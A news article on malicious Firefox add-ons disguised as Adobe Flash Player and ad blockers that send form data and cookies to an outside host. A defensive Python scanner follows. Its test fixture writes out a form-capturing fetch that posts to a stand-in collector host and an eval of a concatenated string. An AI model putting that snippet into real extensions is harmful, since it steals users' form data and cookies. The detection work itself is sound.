A wave of malicious add-ons in the Firefox catalog, hiding behind Adobe Flash

The Firefox add-ons directory (AMO) has seen a mass publication of malicious add-ons posing as well-known projects. For example, the directory contains malicious add-ons named "Adobe Flash Player", "ublock origin Pro", "Adblock Flash Player", etc.

As soon as such add-ons are removed from the catalog, the attackers create a new account and re-host them. For example, the account "Firefox user 15018635" was created a few hours ago, and the add-ons "Youtube Adblock", "Ublock plus" and "Adblock Plus 2019" are hosted under it. Apparently, the add-on descriptions are crafted so that they rank at the top of results for the search queries "Adobe Flash Player" and "Adobe Flash".


When installed, the add-ons request permission to access all data on the sites you browse. While running, a keylogger is started that sends information about filled-in forms and the cookies that are set to the host theridgeatdanbury.com. The add-on installation files are named "adpbe_flash_player-*.xpi" or "player_downloader-*.xpi". The script code inside the add-ons differs slightly from one to another, but the malicious actions they perform are obvious and not concealed.


Probably, the absence of any technique for hiding malicious activity and the extremely simple code are what let these add-ons pass the automated preliminary review system. At the same time, it is unclear how the explicit, unconcealed sending of data from the add-on to an external host was overlooked during the automated check.


Recall that, according to Mozilla, the introduction of mandatory digital signature verification would block the spread of malicious and spying add-ons to users. Some extension developers disagree with this position and believe that mandatory signature verification only creates difficulties for developers and increases the time it takes to deliver corrective releases to users, without affecting security in any way. There are many trivial and obvious tricks for bypassing the automated add-on checks that allow malicious code to be inserted silently, for example by building an operation on the fly by concatenating several strings and then executing the resulting string via a call to eval. Mozilla's position came down to the fact that most authors of malicious add-ons are lazy and will not resort to such techniques to hide malicious activity.
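As an added illustration (not from the article, and not Mozilla's own reviewer tooling), the following Python scanner flags in an .xpi the traits described above: a host permission covering every site, hooks on form or keyboard events, eval over a concatenated string, and network calls to an external host. The rule names and the sample add-on it scans are constructed for this example and are not the real add-ons.

```python
import io
import json
import re
import zipfile
# Host permissions that grant access to every site the user visits.
BROAD_HOST_PERMS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Heuristics for the traits described above: eval over a concatenated string,
# hooks on form or keyboard events, and network calls to an external host.
EVAL_CONCAT = re.compile(r"\beval\s*\(\s*[^)]*\+")
INPUT_HOOK = re.compile(r"addEventListener\s*\(\s*['\"](keydown|keypress|keyup|input|submit)['\"]")
NETWORK_CALL = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b")
EXTERNAL_URL = re.compile(r"https?://([A-Za-z0-9.-]+)")


def scan_xpi(xpi_bytes):
    """Return a list of finding tags for an .xpi (zip archive) given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(xpi_bytes)) as z:
        names = z.namelist()
        if "manifest.json" in names:
            manifest = json.loads(z.read("manifest.json"))
            perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
            if perms & BROAD_HOST_PERMS:
                findings.append("broad-host-permission")
            if "cookies" in perms:
                findings.append("cookies-permission")
        for name in (n for n in names if n.endswith(".js")):
            src = z.read(name).decode("utf-8", "replace")
            if EVAL_CONCAT.search(src):
                findings.append(f"eval-of-concatenated-string:{name}")
            if INPUT_HOOK.search(src):
                findings.append(f"input-capture:{name}")
            hosts = sorted(set(EXTERNAL_URL.findall(src)))
            if hosts and NETWORK_CALL.search(src):
                findings.append(f"network-to-external-host:{name}:{','.join(hosts)}")
    return findings


def build_sample_xpi():
    """Constructed test fixture (not the real add-ons) reproducing the described traits."""
    manifest = {"manifest_version": 2, "name": "Sample Player", "version": "1.0",
                "permissions": ["<all_urls>", "cookies"]}
    content_js = ("document.addEventListener('submit', e => {\n"
                  "  fetch('https://collector.example/log', {method: 'POST', body: new FormData(e.target)});\n"
                  "});\neval('con' + 'sole.log(1)');\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("manifest.json", json.dumps(manifest))
        z.writestr("content.js", content_js)
    return buf.getvalue()
```

Such pattern rules are a triage aid for picking add-ons for manual review, not a replacement for it: a string split across more than one statement, or a host assembled at runtime, will not match them.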

In October 2017, the AMO catalog introduced a new process for reviewing add-ons. Manual review was replaced by an automated process that eliminates long review queues and speeds up delivery of new releases to users. At the same time, manual review was not abolished entirely, but is carried out selectively for add-ons that are already published. Add-ons for manual review are selected on the basis of calculated risk factors.

Source: opennet.ru
